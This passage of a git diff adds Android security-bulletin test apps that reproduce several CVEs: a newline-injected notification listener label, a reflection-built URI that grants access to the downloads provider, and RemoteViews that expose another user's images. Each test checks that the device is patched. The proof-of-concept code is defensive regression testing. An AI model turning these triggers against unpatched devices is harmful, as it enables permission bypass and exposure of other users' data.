+                () ->
+                  resumedTruePattern
+                      .matcher(mUiDevice.executeShellCommand(dumpsysActivityCmd))
+                      .find())
+                      .toBeEqualTo(true)
+                      .timeout(Duration.ofMillis(timeoutMs))
+                      .await();
+
+            // Fail test if PlatLogoActivity was launched
+            assertFalse(
+                    "Device is vulnerable to b/250589026, Unexported activities can be launched"
+                            + "using ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY from a workProfile",
+                    resumedTruePattern
+                            .matcher(mUiDevice.executeShellCommand(dumpsysActivityCmd))
+                            .find());
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                uiAutomation.dropShellPermissionIdentity();
+                mUiDevice.pressHome();
+            } catch (Exception e) {
+                // Ignore exceptions as the test has finished
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp
new file mode 100644
index 0000000..454f3c5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21260",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "src/**/*.java"
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+    sdk_version: "current",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml
new file mode 100644
index 0000000..016907d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/AndroidManifest.xml
@@ -0,0 +1,33 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21260">
+    <!-- Added '__' prefix to label to make the app appear at the top of list in settings -->
+    <application android:label="__CVE_2023_21260">
+        <service android:name=".TestListener"
+            android:label="\n\nCVE_2023_21260_TestListener_BugPresent"
+            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE"
+            android:exported="true">
+          <intent-filter>
+              <action android:name="android.service.notification.NotificationListenerService" />
+          </intent-filter>
+        </service>
+    </application>
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21260" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java
new file mode 100644
index 0000000..6d7b97e
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/DeviceTest.java
@@ -0,0 +1,88 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21260;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.content.Intent;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    @Test
+    public void testCVE_2023_21260() {
+        try {
+            final int waitMS = 5_000;
+            Instrumentation instrumentation = getInstrumentation();
+            UiDevice device = UiDevice.getInstance(instrumentation);
+
+            // Launch Notification listener settings
+            instrumentation
+                    .getContext()
+                    .startActivity(
+                            new Intent(Settings.ACTION_NOTIFICATION_LISTENER_SETTINGS)
+                                    .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
+                                    .addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK));
+
+            // Click on '__CVE_2023_21260' to launch Notification access permission dialog box for
+            // the TestListener
+            Pattern testListenerPattern =
+                    Pattern.compile("__CVE_2023_21260", Pattern.CASE_INSENSITIVE);
+            assumeTrue(
+                    "Test app not found in Notification access app list",
+                    device.wait(Until.hasObject(By.text(testListenerPattern)), waitMS));
+            final String carSettingsPackage = device.getCurrentPackageName();
+            device.findObject(By.text(testListenerPattern)).click();
+
+            // Find Notification access permission dialog box
+            final BySelector popupTitleAutomotiveSelector =
+                    By.clazz(android.widget.TextView.class.getName())
+                            .res(carSettingsPackage + ":id/car_ui_alert_title")
+                            .pkg(carSettingsPackage);
+            assumeTrue(
+                    "Notification access permission dialog box not found",
+                    device.wait(Until.hasObject(popupTitleAutomotiveSelector), waitMS));
+
+            // With fix, the CRLF characters in the TestListener label would be removed
+            assertFalse(
+                    "Vulnerable to b/259384309",
+                    device.findObject(popupTitleAutomotiveSelector)
+                            .getText()
+                            .contains("\n\nCVE_2023_21260_TestListener_BugPresent"));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
similarity index 70%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
index 4416990..6ffd19b 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21260/src/android/security/cts/CVE_2023_21260/TestListener.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.CVE_2023_21260;
 
-import android.app.Activity;
+import android.service.notification.NotificationListenerService;
 
-public class PocActivity extends Activity {
-}
+public class TestListener extends NotificationListenerService {}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp
new file mode 100644
index 0000000..bc60c24
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/Android.bp
@@ -0,0 +1,47 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21272-test",
+    srcs: [
+        "test-app/src/**/*.java"
+    ],
+    test_suites: [
+        "sts",
+    ],
+    manifest: "test-app/AndroidManifest.xml",
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+    ],
+    platform_apis: true,
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21272-helper",
+    test_suites: [
+        "sts",
+    ],
+    srcs: [
+        "helper-app/src/**/*.java"
+    ],
+    manifest: "helper-app/AndroidManifest.xml",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml
new file mode 100644
index 0000000..95ced3d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21272_helper">
+    <application>
+        <activity android:name=".PocActivity"
+            android:exported="true" />
+    </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java
new file mode 100644
index 0000000..744cc754
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/helper-app/src/android/security/cts/CVE_2023_21272_helper/PocActivity.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_helper;
+
+import static android.content.pm.PackageManager.PERMISSION_GRANTED;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.net.Uri;
+import android.os.Process;
+
+public class PocActivity extends Activity {
+    @Override
+    protected void onResume() {
+        super.onResume();
+
+        // If current package has permission to 'downloads' authority then send broadcast
+        if (this.checkUriPermission(
+                        Uri.parse("content://downloads/all_downloads"),
+                        Process.myPid(),
+                        Process.myUid(),
+                        0 /* modeFlags */)
+                == PERMISSION_GRANTED) {
+            sendBroadcast((getIntent().getParcelableExtra(Intent.EXTRA_INTENT)));
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..7afe635
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/AndroidManifest.xml
@@ -0,0 +1,28 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21272_test">
+    <application>
+        <provider android:name=".TestProvider"
+            android:authorities="download"
+            android:grantUriPermissions="true"
+            android:enabled="true" />
+    </application>
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21272_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java
new file mode 100644
index 0000000..3909376
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/DeviceTest.java
@@ -0,0 +1,123 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_test;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+
+import android.app.ActivityManager;
+import android.content.BroadcastReceiver;
+import android.content.Context;
+import android.content.Intent;
+import android.content.IntentFilter;
+import android.net.Uri;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.lang.reflect.Constructor;
+import java.util.concurrent.Semaphore;
+import java.util.concurrent.TimeUnit;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    @Test
+    public void testCVE_2023_21272() {
+        try {
+            Context context = getInstrumentation().getContext();
+
+            // 'Path', 'PathPart', and 'HierarchicalUri' classes are in default scope of Uri.java.
+            // Hence, reflection is used to access their APIs
+            final String targetPkg = "android.security.cts.CVE_2023_21272_helper";
+            Class partClass = Class.forName("android.net.Uri$Part");
+            Constructor partConstructor =
+                    partClass.getDeclaredConstructor(String.class, String.class);
+            partConstructor.setAccessible(true);
+
+            Class pathPartClass = Class.forName("android.net.Uri$PathPart");
+            Constructor pathPartConstructor =
+                    pathPartClass.getDeclaredConstructor(String.class, String.class);
+            pathPartConstructor.setAccessible(true);
+
+            Class hierarchicalUriClass = Class.forName("android.net.Uri$HierarchicalUri");
+            Constructor hierarchicalUriConstructor =
+                    hierarchicalUriClass.getDeclaredConstructor(
+                            String.class, partClass, pathPartClass, partClass, partClass);
+            hierarchicalUriConstructor.setAccessible(true);
+
+            final String testAuthority = "download";
+            Object authority = partConstructor.newInstance(testAuthority, testAuthority);
+            final String testPath = "s/all_downloads";
+            Object path = pathPartConstructor.newInstance(testPath, testPath);
+            Uri testUri =
+                    (Uri)
+                            hierarchicalUriConstructor.newInstance(
+                                    "content",
+                                    authority,
+                                    path,
+                                    null /* query */,
+                                    null /* fragment */);
+            Semaphore broadcastReceived = new Semaphore(0);
+            final String broadcastAction = "CVE_2023_21272_broadcastAction";
+
+            // Register a broadcast receiver to receive broadcast from PocActivity indicating
+            // presence of vulnerability
+            BroadcastReceiver broadcastReceiver =
+                    new BroadcastReceiver() {
+                        @Override
+                        public void onReceive(Context context, Intent intent) {
+                            try {
+                                if (intent.getAction().equals(broadcastAction)) {
+                                    broadcastReceived.release();
+                                }
+                            } catch (Exception ignored) {
+                                // ignore any exceptions
+                            }
+                        }
+                    };
+
+            context.registerReceiver(broadcastReceiver, new IntentFilter(broadcastAction));
+
+            // Grant read uri permission to 'targetPkg' for 'testUri'
+            ActivityManager.getService()
+                    .grantUriPermission(
+                            context.getIApplicationThread(),
+                            targetPkg,
+                            testUri,
+                            Intent.FLAG_GRANT_READ_URI_PERMISSION,
+                            context.getUserId());
+
+            // Check if the uri permission was granted to correct authority or not. Without fix,
+            // permission is granted to 'downloads' authority and the test fails
+            context.startActivity(
+                    new Intent()
+                            .setClassName(targetPkg, targetPkg + ".PocActivity")
+                            .putExtra(Intent.EXTRA_INTENT, new Intent(broadcastAction))
+                            .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+            assertFalse(
+                    "Vulnerable to b/227471459",
+                    broadcastReceived.tryAcquire(5_000 /* waitMs */, TimeUnit.MILLISECONDS));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java
new file mode 100644
index 0000000..cb5f575
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21272/test-app/src/android/security/cts/CVE_2023_21272_test/TestProvider.java
@@ -0,0 +1,61 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21272_test;
+
+import android.content.ContentProvider;
+import android.content.ContentValues;
+import android.database.Cursor;
+import android.net.Uri;
+
+public class TestProvider extends ContentProvider {
+    public TestProvider() {}
+
+    @Override
+    public int delete(Uri uri, String selection, String[] selectionArgs) {
+        return 0;
+    }
+
+    @Override
+    public String getType(Uri uri) {
+        return "";
+    }
+
+    @Override
+    public Uri insert(Uri uri, ContentValues values) {
+        return null;
+    }
+
+    @Override
+    public boolean onCreate() {
+        return false;
+    }
+
+    @Override
+    public Cursor query(
+            Uri uri,
+            String[] projection,
+            String selection,
+            String[] selectionArgs,
+            String sortOrder) {
+        return null;
+    }
+
+    @Override
+    public int update(Uri uri, ContentValues values, String selection, String[] selectionArgs) {
+        return 0;
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp
new file mode 100644
index 0000000..a1460c4
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/Android.bp
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21279",
+    defaults: [
+        "cts_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml
new file mode 100644
index 0000000..4a3a362
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/AndroidManifest.xml
@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21279">
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21279" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml
new file mode 100644
index 0000000..2d6ff03
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/res/layout/cve_2023_21279_layout.xml
@@ -0,0 +1,21 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<ImageView xmlns:android="http://schemas.android.com/apk/res/android"
+    android:id="@+id/cve_2023_21279_img"
+    android:layout_width="match_parent"
+    android:layout_height="match_parent" />
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java
new file mode 100644
index 0000000..9041934
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21279/src/android/security/cts/CVE_2023_21279/DeviceTest.java
@@ -0,0 +1,150 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21279;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertNull;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.UiAutomation;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.util.SizeF;
+import android.widget.RemoteViews;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.UiObject2;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.HashMap;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    private AutoCloseable withAdoptShellPermissionIdentity(
+            UiAutomation uiAutomation, String permission) {
+        uiAutomation.adoptShellPermissionIdentity(permission);
+
+        // Remove permissions
+        return () -> uiAutomation.dropShellPermissionIdentity();
+    }
+
+    @Test
+    public void testPocCVE_2023_21279() {
+        UiDevice uiDevice = null;
+        try {
+            final String cveId = "cve_2023_21279_";
+            final String title = cveId + "title";
+            final Uri externalContentUri = MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+            UiAutomation uiAutomation = instrumentation.getUiAutomation();
+            uiDevice = UiDevice.getInstance(instrumentation);
+            int userId = -1;
+
+            // Retrieve created user Id
+            try (AutoCloseable withAdoptShellPermissionIdentity =
+                    withAdoptShellPermissionIdentity(
+                            uiAutomation, android.Manifest.permission.CREATE_USERS)) {
+                final List<UserInfo> list = context.getSystemService(UserManager.class).getUsers();
+                for (UserInfo info : list) {
+                    if (info.name.contains(cveId)) {
+                        userId = info.id;
+                        break;
+                    }
+                }
+            }
+            assumeTrue(userId != -1);
+
+            RemoteViews remoteView1 =
+                    new RemoteViews(context.getPackageName(), R.layout.cve_2023_21279_layout);
+            remoteView1.setImageViewUri(
+                    R.id.cve_2023_21279_img,
+                    ContentProvider.maybeAddUserId(externalContentUri, userId));
+            RemoteViews remoteView2 = remoteView1;
+            HashMap<SizeF, RemoteViews> remoteViewsMap = new HashMap<SizeF, RemoteViews>();
+            remoteViewsMap.put(new SizeF(0, 0), remoteView1);
+            remoteViewsMap.put(new SizeF(1, 1), remoteView2);
+            RemoteViews remoteViewOuter = new RemoteViews(remoteViewsMap);
+            NotificationChannel notificationChannel =
+                    new NotificationChannel(cveId, cveId, NotificationManager.IMPORTANCE_DEFAULT);
+            NotificationManager notificationManager =
+                    context.getSystemService(NotificationManager.class);
+            notificationManager.createNotificationChannel(notificationChannel);
+            Notification notification =
+                    new Notification.Builder(context, cveId)
+                            .setContentTitle(title)
+                            .setSmallIcon(
+                                    Icon.createWithData(
+                                            new byte[0] /* data */, 0 /* offset */, 0 /* length */))
+                            .setCustomContentView(remoteViewOuter)
+                            .setCustomBigContentView(remoteViewOuter)
+                            .build();
+            try {
+                notificationManager.notify(0 /* id */, notification);
+            } catch (SecurityException securityException) {
+                if (securityException
+                        .getLocalizedMessage()
+                        .toLowerCase()
+                        .contains(externalContentUri.toString())) {
+                    // Ignore exception thrown with fix and exit the test
+                    return;
+                } else {
+                    throw securityException;
+                }
+            }
+
+            // Open notification shade
+            assumeTrue("Opening notification shade unsuccessful", uiDevice.openNotification());
+
+            // Wait for notification to appear and detect if the remote view is present
+            uiDevice.wait(Until.hasObject(By.text(title)), 3000 /* timeout */);
+            UiObject2 exposedImg =
+                    uiDevice.findObject(By.res(context.getPackageName(), cveId + "img"));
+            assertNull(
+                    "Device is vulnerable to b/277741109, Other user's images can be exposed in"
+                            + " notifications using remote views",
+                    exposedImg);
+        } catch (Exception e) {
+            assumeNoException(e);
+        } finally {
+            try {
+                uiDevice.pressHome();
+            } catch (Exception e) {
+                // Ignore exceptions as the test has finished
+            }
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp
new file mode 100644
index 0000000..3700d8b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21285",
+    defaults: [
+        "cts_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "compatibility-device-util-axt",
+        "sts-device-util",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml
new file mode 100644
index 0000000..46a9d56
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21285/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
